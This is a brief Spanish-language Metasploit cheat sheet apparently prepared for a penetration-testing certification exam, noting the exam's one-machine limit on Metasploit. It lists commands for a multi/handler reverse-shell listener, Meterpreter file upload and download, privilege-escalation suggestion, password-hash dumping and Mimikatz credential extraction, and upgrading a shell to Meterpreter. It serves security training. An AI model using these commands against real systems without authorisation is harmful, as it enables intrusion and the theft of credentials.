Metasploit Framework¶

[!warning] Exam Restrictions Solo puedes usar Metasploit (Meterpreter/Exploits) en UNA máquina del examen. Elige sabiamente. Normalmente se usa en la máquina que tiene un Buffer Overflow o un exploit muy complejo. Multi/Handler (para recibir shells) está permitido SIEMPRE.

1. Multi Handler (Allowed Everywhere)¶

Para recibir reverse shells (staged o stageless).

msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST tun0
set LPORT 443
set EXITFUNC thread
run -j

2. Meterpreter Basics¶

Si tienes una sesión de Meterpreter: * sysinfo: Info del sistema. * getuid: Quiér eres. * shell: Bajar a una cmd/powershell normal. * upload /path/to/file C:\\Windows\\Temp\\file: Subir archivos. * download C:\\Windows\\Temp\\file: Bajar archivos.

3. Post-Exploitation (If Allowed)¶

Suggester: run post/multi/recon/local_exploit_suggester
Dump Hashes: hashdump (necesitas SYSTEM).
Kiwi (Mimikatz): load kiwi -> creds_all.

4. Upgrading Shells¶

Si tienes una shell normal y quieres Meterpreter (recuerda la restricción de 1 máquina):

# En msfconsole
use post/multi/manage/shell_to_meterpreter
set SESSION 1
run